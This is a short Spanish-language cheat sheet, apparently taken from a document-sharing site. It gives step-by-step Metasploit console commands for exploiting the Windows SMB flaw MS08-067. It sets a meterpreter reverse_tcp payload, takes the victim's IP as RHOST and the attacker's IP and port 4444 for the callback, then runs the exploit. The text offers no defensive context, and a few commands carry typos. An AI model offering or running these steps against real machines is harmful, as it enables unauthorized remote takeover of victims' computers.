Está en la página 1de 1

activar posgresql (service posgresql start)

activar metasploit (service metasploit start)


activar comando: msfconsole
msf > search netapi
copiar un explor de los buscados en netapi: msf > use expliot
/windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit (ms08_067_netapi) > show options (muestra las opciones de la victima
ip, puerto)
msf exploit (ms08_067_netapi) > set RHOST [IP victima]
msf exploit (ms08_067_netapi) > set LHOST [IP atacante]
msf exploit (ms08_067_netapi) > set LPORT 4444
msf exploit (ms08_067_netapi) > exploit

También podría gustarte